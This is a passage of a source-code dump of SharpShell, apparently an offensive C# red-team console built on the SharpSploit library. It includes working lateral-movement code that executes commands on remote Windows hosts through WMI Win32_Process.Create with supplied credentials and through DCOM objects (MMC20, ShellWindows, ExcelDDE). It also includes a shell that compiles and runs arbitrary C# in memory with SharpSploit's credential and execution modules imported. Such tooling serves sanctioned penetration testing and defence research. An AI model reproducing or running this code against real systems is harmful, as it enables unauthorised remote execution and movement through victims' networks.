This is 90 | /// a port of Steve Borosh (rvrshell)'s Invoke-DCOM implementation available 91 | /// here: https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1 92 | /// 93 | public static List DCOMExecute(List ComputerNames, string Command, string Parameters = "", string Directory = "C:\\WINDOWS\\System32\\", DCOMMethod Method = DCOMMethod.MMC20_Application) 94 | { 95 | return ComputerNames.Select(CN => DCOMExecute(CN, Command, Parameters, Directory, Method)).ToList(); 96 | } 97 | 98 | public enum DCOMMethod 99 | { 100 | MMC20_Application, 101 | ShellWindows, 102 | ShellBrowserWindow, 103 | ExcelDDE 104 | } 105 | 106 | private static readonly Dictionary CLSIDs = new Dictionary 107 | { 108 | { DCOMMethod.ShellWindows, new Guid("9BA05972-F6A8-11CF-A442-00A0C90A8F39") }, 109 | { DCOMMethod.ShellBrowserWindow, new Guid("C08AFD90-F2A1-11D1-8455-00A0C91F3880") } 110 | }; 111 | } 112 | } 113 | -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/LateralMovement/WMI.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Linq; 7 | using System.Management; 8 | using System.Collections.Generic; 9 | 10 | namespace SharpSploit.LateralMovement 11 | { 12 | /// 13 | /// WMI is a class for executing WMI lateral movement techniques. 14 | /// 15 | public class WMI 16 | { 17 | /// 18 | /// Execute a process on a remote system using the WMI Win32_Process.Create method. 19 | /// 20 | /// ComputerName of remote system to execute process. 21 | /// Command to execute on remote system. 22 | /// Username to authenticate as to the remote system. 23 | /// Password to authenticate the user. 24 | /// Bool. True if execution succeeds, false otherwise. 
public static bool WMIExecute(string ComputerName, string Command, string Username, string Password)
{
    // Explicit credentials for the remote connection; both are held as ordinary managed strings.
    ConnectionOptions connection = new ConnectionOptions
    {
        Username = Username,
        Password = Password
    };
    string cimv2Path = String.Format("\\\\{0}\\root\\cimv2", ComputerName);
    ManagementScope remoteScope = new ManagementScope(cimv2Path, connection);

    // Set only when every call below finished without throwing. The Win32_Process.Create
    // return code is printed but never inspected, so true does not by itself mean that
    // the remote process was created.
    bool completed = false;
    try
    {
        remoteScope.Connect();
        ManagementClass processClass = new ManagementClass(remoteScope, new ManagementPath("Win32_Process"), new ObjectGetOptions());

        ManagementBaseObject createArgs = processClass.GetMethodParameters("Create");
        PropertyDataCollection argProperties = createArgs.Properties; // fetched but not used afterwards
        createArgs["CommandLine"] = Command;

        ManagementBaseObject createResult = processClass.InvokeMethod("Create", createArgs, null);

        Console.WriteLine("Win32_Process Create returned: " + createResult["returnValue"].ToString());
        Console.WriteLine("ProcessID: " + createResult["processId"].ToString());
        completed = true;
    }
    catch (Exception e)
    {
        // Any failure (connection, authentication, invocation) is reported on stderr only.
        Console.Error.WriteLine("WMI Exception:" + e.Message);
    }
    return completed;
}

///
/// Execute a process on a remote system using the WMI Win32_Process.Create method.
///
/// ComputerNames of remote systems to execute process.
/// Command to execute on remote system.
/// Username to authenticate as to the remote system.
/// Password to authenticate the user.
/// Bool. True if execution succeeds, false otherwise.
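public static List<bool> WMIExecute(List<string> ComputerNames, string Command, string Username, string Password)
{
    // Runs the single-host overload once per entry, in list order, so result i belongs to
    // ComputerNames[i]. The generic arguments (List<bool>, List<string>) were lost in the page
    // extraction and are restored here from the Select(...).ToList() expression.
    return ComputerNames.Select(CN => WMIExecute(CN, Command, Username, Password)).ToList();
}
} // closes the enclosing class (opened before this excerpt)
} // closes the enclosing namespace

--------------------------------------------------------------------------------
/SharpShell/Data/Source/SharpSploit/Misc/CountdownEvent.cs:
--------------------------------------------------------------------------------
// Author: Ryan Cobb (@cobbr_io)
// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
// License: BSD 3-Clause

using System;
using System.Threading;

namespace SharpSploit.Misc
{
    /// <summary>
    /// CountdownEvent is used for counting Asynchronous operations
    /// </summary>
    /// <remarks>
    /// Adapted from https://stackoverflow.com/questions/6790499
    /// </remarks>
    public sealed class CountdownEvent : IDisposable
    {
        // Set by Signal() whenever a signal arrives that does not yet reach the target count.
        private readonly ManualResetEvent _countEvent = new ManualResetEvent(false);
        // Set by Signal() once the target count has been reached.
        private readonly ManualResetEvent _reachedCountEvent = new ManualResetEvent(false);
        private volatile int _maxCount;
        private volatile int _currentCount = 0;
        private volatile bool _isDisposed = false;

        /// <summary>
        /// Creates an event that is considered reached after <paramref name="count"/> signals.
        /// </summary>
        /// <param name="count">Number of Signal() calls to wait for.</param>
        public CountdownEvent(int count)
        {
            this._maxCount = count;
        }

        /// <summary>
        /// Records one completed operation.
        /// </summary>
        /// <returns>
        /// True when the target count has been reached (by this call or an earlier one);
        /// false otherwise, including after the instance has been disposed.
        /// </returns>
        public bool Signal()
        {
            if (this._isDisposed)
            {
                return false;
            }
            if (this._currentCount >= this._maxCount)
            {
                return true;
            }
            if (Interlocked.Increment(ref _currentCount) >= this._maxCount)
            {
                _reachedCountEvent.Set();
                return true;
            }
            _countEvent.Set();
            return false;
        }

        /// <summary>
        /// Blocks until the target count has been reached or the timeout elapses.
        /// </summary>
        /// <param name="timeout">Timeout in milliseconds; infinite by default.</param>
        /// <returns>True if the count was reached; false on timeout or after disposal.</returns>
        public bool Wait(int timeout = Timeout.Infinite)
        {
            if (this._isDisposed)
            {
                return false;
            }
            return _reachedCountEvent.WaitOne(timeout);
        }

        /// <summary>
        /// Blocks until a signal that did not reach the target count has been recorded, or the
        /// timeout elapses.
        /// </summary>
        /// <remarks>
        /// The underlying event is manual-reset and is never reset in this class, so once it has
        /// been set every later call returns immediately.
        /// </remarks>
        /// <param name="timeout">Timeout in milliseconds; infinite by default.</param>
        /// <returns>True if the event was set; false on timeout or after disposal.</returns>
        public bool WaitOne(int timeout = Timeout.Infinite)
        {
            if (this._isDisposed)
            {
                return false;
            }
            return _countEvent.WaitOne(timeout);
        }

        /// <summary>
        /// Releases both wait handles.
        /// </summary>
        public void Dispose()
        {
            this.Dispose(true);
            GC.SuppressFinalize(this);
        }

        /// <summary>
        /// Disposes the wait handles when <paramref name="disposing"/> is true and marks the
        /// instance as disposed; later calls do nothing.
        /// </summary>
        /// <param name="disposing">True when called from Dispose().</param>
        public void Dispose(bool disposing)
        {
            if (!this._isDisposed)
            {
                if (disposing)
                {
                    ((IDisposable)_reachedCountEvent).Dispose();
                    ((IDisposable)_countEvent).Dispose();
                }
                this._isDisposed = true;
            }
        }
    }
}

--------------------------------------------------------------------------------
/SharpShell/Data/Source/SharpSploit/Misc/Utilities.cs:
--------------------------------------------------------------------------------
// Author: Ryan Cobb (@cobbr_io)
// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
// License: BSD 3-Clause

using System.IO;
using System.IO.Compression;
using System.Linq;
using System.Reflection;

namespace SharpSploit.Misc
{
    /// <summary>
    /// Helpers for reading embedded resources and for Deflate compression.
    /// </summary>
    public static class Utilities
    {
        // Names of all manifest resources in the executing assembly, captured once at type load.
        private static string[] manifestResources = Assembly.GetExecutingAssembly().GetManifestResourceNames();

        /// <summary>
        /// Returns the bytes of an embedded resource, preferring a Deflate-compressed
        /// "&lt;name&gt;.comp" variant when one is present.
        /// </summary>
        /// <remarks>
        /// Resource names are matched by substring and the first match wins, so a short
        /// <paramref name="resourceName"/> can select a different resource than intended.
        /// </remarks>
        /// <param name="resourceName">Name (or name fragment) of the resource to load.</param>
        /// <returns>The resource bytes (decompressed if needed), or null when nothing matches.</returns>
        public static byte[] GetEmbeddedResourceBytes(string resourceName)
        {
            Assembly assembly = Assembly.GetExecutingAssembly();

            string compressedName = manifestResources.FirstOrDefault(N => N.Contains(resourceName + ".comp"));
            if (compressedName != null)
            {
                // Dispose the resource stream; the original left it open.
                using (Stream stream = assembly.GetManifestResourceStream(compressedName))
                {
                    return Decompress(stream.ReadFully());
                }
            }

            string plainName = manifestResources.FirstOrDefault(N => N.Contains(resourceName));
            if (plainName != null)
            {
                using (Stream stream = assembly.GetManifestResourceStream(plainName))
                {
                    return stream.ReadFully();
                }
            }
            return null;
        }

        /// <summary>
        /// Reads a stream from its current position to the end.
        /// </summary>
        /// <param name="input">Stream to read; it is not closed by this method.</param>
        /// <returns>All bytes read.</returns>
        public static byte[] ReadFully(this Stream input)
        {
            // Manual copy loop in 16 KiB chunks.
            byte[] buffer = new byte[16 * 1024];
            using (MemoryStream ms = new MemoryStream())
            {
                int read;
                while ((read = input.Read(buffer, 0, buffer.Length)) > 0)
                {
                    ms.Write(buffer, 0, read);
                }
                return ms.ToArray();
            }
        }

        /// <summary>
        /// Compresses a byte array with Deflate.
        /// </summary>
        /// <param name="Bytes">Data to compress.</param>
        /// <returns>The compressed bytes.</returns>
        public static byte[] Compress(byte[] Bytes)
        {
            byte[] compressedBytes;
            using (MemoryStream memoryStream = new MemoryStream())
            {
                // The DeflateStream must be closed before ToArray() so the final block is flushed.
                using (DeflateStream deflateStream = new DeflateStream(memoryStream, CompressionMode.Compress))
                {
                    deflateStream.Write(Bytes, 0, Bytes.Length);
                }
                compressedBytes = memoryStream.ToArray();
            }
            return compressedBytes;
        }

        /// <summary>
        /// Decompresses a Deflate-compressed byte array.
        /// </summary>
        /// <remarks>
        /// The output size is not capped. That is acceptable for resources embedded at build
        /// time; do not feed this method data from an untrusted source without adding a limit.
        /// </remarks>
        /// <param name="compressed">Deflate-compressed data.</param>
        /// <returns>The decompressed bytes.</returns>
        public static byte[] Decompress(byte[] compressed)
        {
            // Wrap the input directly instead of copying it into a second stream and rewinding.
            using (MemoryStream inputStream = new MemoryStream(compressed))
            using (MemoryStream outputStream = new MemoryStream())
            {
                using (DeflateStream deflateStream = new DeflateStream(inputStream, CompressionMode.Decompress))
                {
                    byte[] buffer = new byte[4096];
                    int bytesRead;
                    while ((bytesRead = deflateStream.Read(buffer, 0, buffer.Length)) != 0)
                    {
                        outputStream.Write(buffer, 0, bytesRead);
                    }
                }
                return outputStream.ToArray();
            }
        }
    }
}

--------------------------------------------------------------------------------
/SharpShell/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.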
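[assembly: AssemblyTitle("SharpShell")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("SharpShell")]
[assembly: AssemblyCopyright("Copyright © 2018")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("bdba47c5-e823-4404-91d0-7f6561279525")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

--------------------------------------------------------------------------------
/SharpShell/SharpShell.cs:
--------------------------------------------------------------------------------
// Author: Ryan Cobb (@cobbr_io)
// Project: SharpShell (https://github.com/cobbr/SharpShell)
// License: BSD 3-Clause

using System;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Collections.Generic;

using YamlDotNet.Serialization;
using Microsoft.CodeAnalysis;

namespace SharpShell
{
    /// <summary>
    /// Interactive console loop: each entry is wrapped in a generated class, compiled in memory
    /// and executed in this process.
    /// </summary>
    /// <remarks>
    /// Review note: entered code runs with the full privileges of the user running the shell.
    /// There is no sandbox or separate AppDomain, and every evaluated entry loads one more
    /// assembly into the process, where it stays until the process exits.
    /// </remarks>
    class SharpShell
    {
        // Template for the generated source: {0} = extra using directives entered by the user,
        // {1} = generated class name, {2} = the user's statements. Doubled braces are literal.
        public static string WrapperFunctionFormat =
@"using System;
using System.IO;
using System.Linq;
using System.Text;
using System.Security;
using System.Security.Principal;
using System.Collections.Generic;
{0}

using SharpSploit.Credentials;
using SharpSploit.Enumeration;
using SharpSploit.Execution;
using SharpSploit.Generic;
using SharpSploit.Misc;

public static class {1}
{{
    public static object Execute()
    {{
        {2}
    }}
}}
";

        /// <summary>
        /// Runs the read-compile-execute loop until "exit"/"quit" is entered or input ends.
        /// </summary>
        /// <param name="args">Command-line arguments (not used).</param>
        static void Main(string[] args)
        {
            bool printPrompt = true;
            // Generic arguments below were stripped by the page extraction; List<string> is
            // restored from the Add(string) calls on both lists.
            List<string> UsingImports = new List<string>();
            List<string> lines = new List<string>();
            // Unused below (Compile is called statically); kept in case construction matters.
            Compiler compiler = new Compiler();
            while (true)
            {
                // Display Prompt
                if (printPrompt)
                {
                    Console.Write("SharpShell > ");
                }
                else
                {
                    Console.Write(">>> ");
                }

                // Read Input
                string line = Console.ReadLine();
                if (line == null)
                {
                    // End of input (closed or redirected stdin): leave instead of failing on
                    // a null reference.
                    return;
                }
                string trimmed = line.Trim();

                // SharpShell Special Commands
                if (string.Equals(trimmed, "exit", StringComparison.OrdinalIgnoreCase) ||
                    string.Equals(trimmed, "quit", StringComparison.OrdinalIgnoreCase))
                {
                    return;
                }
                else if (trimmed == "")
                {
                    continue;
                }
                else if (trimmed.EndsWith("\\", StringComparison.Ordinal))
                {
                    // Line continuation. Strip trailing whitespace first so the backslash is
                    // removed even when spaces follow it.
                    printPrompt = false;
                    lines.Add(line.TrimEnd().TrimEnd('\\'));
                    continue;
                }
                else if (trimmed.StartsWith("using ", StringComparison.Ordinal) && trimmed.Split(' ').Length == 2 && trimmed.EndsWith(";", StringComparison.Ordinal))
                {
                    Console.WriteLine("Import:\"" + trimmed + "\" now being used.");
                    UsingImports.Add(trimmed);
                    continue;
                }

                try
                {
                    // Concatenation
                    printPrompt = true;
                    string source = String.Join(Environment.NewLine, lines.ToArray());
                    lines.Clear();
                    source = source + Environment.NewLine + line;
                    // An entry without any "return " is treated as a single expression.
                    if (!source.Contains("return "))
                    {
                        source = "return " + source;
                    }

                    // Compilation
                    string ClassName = RandomString();

                    Compiler.CompilationRequest request = new Compiler.CompilationRequest
                    {
                        Source = String.Format(WrapperFunctionFormat, String.Join(Environment.NewLine, UsingImports.ToArray()), ClassName, source),
                        AssemblyName = "SharpShell",
                        Optimize = true,
                        TargetDotNetVersion = Compiler.DotNetVersion.Net35,
                        OutputKind = OutputKind.DynamicallyLinkedLibrary,
                        Platform = Platform.AnyCpu,
                        SourceDirectory = Common.SharpShellSourceDirectory,
                        ResourceDirectory = Common.SharpShellResourcesDirectory,
                        ReferenceDirectory = Common.SharpShellReferencesDirectory
                    };

                    // NOTE(review): the type arguments of both Deserialize calls were lost in the
                    // page extraction ("Deserialize>(reader)"). List<Compiler.Reference> and
                    // List<Compiler.EmbeddedResource> are inferred from the members used in the
                    // filters; confirm against Compiler.cs.
                    using (TextReader reader = File.OpenText(Common.SharpShellReferencesConfig))
                    {
                        var deserializer = new DeserializerBuilder().Build();
                        request.References = deserializer.Deserialize<List<Compiler.Reference>>(reader)
                            .Where(R => R.Framework == request.TargetDotNetVersion)
                            .Where(R => R.Enabled)
                            .ToList();
                    }
                    using (TextReader reader = File.OpenText(Common.SharpShellResourcesConfig))
                    {
                        var deserializer = new DeserializerBuilder().Build();
                        request.EmbeddedResources = deserializer.Deserialize<List<Compiler.EmbeddedResource>>(reader)
                            .Where(ER => ER.Enabled)
                            .ToList();
                    }
                    byte[] assemblyBytes = Compiler.Compile(request);

                    // Execution
                    Assembly assembly = Assembly.Load(assemblyBytes);
                    object result = assembly.GetType(ClassName).GetMethod("Execute").Invoke(null, null);
                    // WriteLine(object) prints an empty line for null; the original called
                    // ToString() on the result and reported a RuntimeException for null values.
                    Console.WriteLine(result);
                }
                catch (CompilerException e)
                {
                    Console.Error.WriteLine(e.Message);
                }
                catch (Exception e)
                {
                    Console.Error.WriteLine("RuntimeException: " + e.Message + e.StackTrace);
                }
            }
        }

        // System.Random is not a cryptographic generator; here it only produces class names.
        private static Random random = new Random();

        /// <summary>
        /// Builds a random identifier: one uppercase letter followed by 10 to 29 uppercase
        /// letters or digits.
        /// </summary>
        /// <returns>The generated identifier.</returns>
        private static string RandomString()
        {
            const string alphachars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
            const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
            return alphachars[random.Next(alphachars.Length)] + new string(Enumerable.Repeat(chars, random.Next(10, 30)).Select(s => s[random.Next(s.Length)]).ToArray());
        }
    }
}

--------------------------------------------------------------------------------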
/SharpShell/SharpShell.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {BDBA47C5-E823-4404-91D0-7F6561279525} 8 | Exe 9 | SharpShell 10 | SharpShell 11 | v4.6 12 | 512 13 | true 14 | 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | ..\packages\Microsoft.CodeAnalysis.Common.2.9.0\lib\netstandard1.3\Microsoft.CodeAnalysis.dll 38 | 39 | 40 | ..\packages\Microsoft.CodeAnalysis.CSharp.2.9.0\lib\netstandard1.3\Microsoft.CodeAnalysis.CSharp.dll 41 | 42 | 43 | 44 | ..\packages\System.AppContext.4.3.0\lib\net46\System.AppContext.dll 45 | 46 | 47 | ..\packages\System.Collections.Immutable.1.5.0\lib\netstandard1.3\System.Collections.Immutable.dll 48 | 49 | 50 | 51 | ..\packages\System.Console.4.3.0\lib\net46\System.Console.dll 52 | 53 | 54 | 55 | 56 | ..\packages\System.Diagnostics.FileVersionInfo.4.3.0\lib\net46\System.Diagnostics.FileVersionInfo.dll 57 | 58 | 59 | ..\packages\System.Diagnostics.StackTrace.4.3.0\lib\net46\System.Diagnostics.StackTrace.dll 60 | 61 | 62 | ..\packages\System.IO.Compression.4.3.0\lib\net46\System.IO.Compression.dll 63 | 64 | 65 | ..\packages\System.IO.FileSystem.4.3.0\lib\net46\System.IO.FileSystem.dll 66 | 67 | 68 | ..\packages\System.IO.FileSystem.Primitives.4.3.0\lib\net46\System.IO.FileSystem.Primitives.dll 69 | 70 | 71 | 72 | ..\packages\System.Reflection.Metadata.1.6.0\lib\portable-net45+win8\System.Reflection.Metadata.dll 73 | 74 | 75 | ..\packages\System.Security.Cryptography.Algorithms.4.3.0\lib\net46\System.Security.Cryptography.Algorithms.dll 76 | 77 | 78 | ..\packages\System.Security.Cryptography.Encoding.4.3.0\lib\net46\System.Security.Cryptography.Encoding.dll 79 | 80 | 81 | ..\packages\System.Security.Cryptography.Primitives.4.3.0\lib\net46\System.Security.Cryptography.Primitives.dll 
82 | 83 | 84 | ..\packages\System.Security.Cryptography.X509Certificates.4.3.0\lib\net46\System.Security.Cryptography.X509Certificates.dll 85 | 86 | 87 | ..\packages\System.Text.Encoding.CodePages.4.3.0\lib\net46\System.Text.Encoding.CodePages.dll 88 | 89 | 90 | ..\packages\System.Threading.Tasks.Extensions.4.3.0\lib\portable-net45+win8+wp8+wpa81\System.Threading.Tasks.Extensions.dll 91 | 92 | 93 | ..\packages\System.Threading.Thread.4.3.0\lib\net46\System.Threading.Thread.dll 94 | 95 | 96 | ..\packages\System.ValueTuple.4.3.0\lib\netstandard1.0\System.ValueTuple.dll 97 | 98 | 99 | 100 | 101 | ..\packages\System.Xml.ReaderWriter.4.3.0\lib\net46\System.Xml.ReaderWriter.dll 102 | 103 | 104 | ..\packages\System.Xml.XmlDocument.4.3.0\lib\net46\System.Xml.XmlDocument.dll 105 | 106 | 107 | ..\packages\System.Xml.XPath.4.3.0\lib\net46\System.Xml.XPath.dll 108 | 109 | 110 | ..\packages\System.Xml.XPath.XDocument.4.3.0\lib\net46\System.Xml.XPath.XDocument.dll 111 | 112 | 113 | ..\packages\YamlDotNet.5.2.1\lib\net45\YamlDotNet.dll 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /SharpShell/packages.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | --------------------------------------------------------------------------------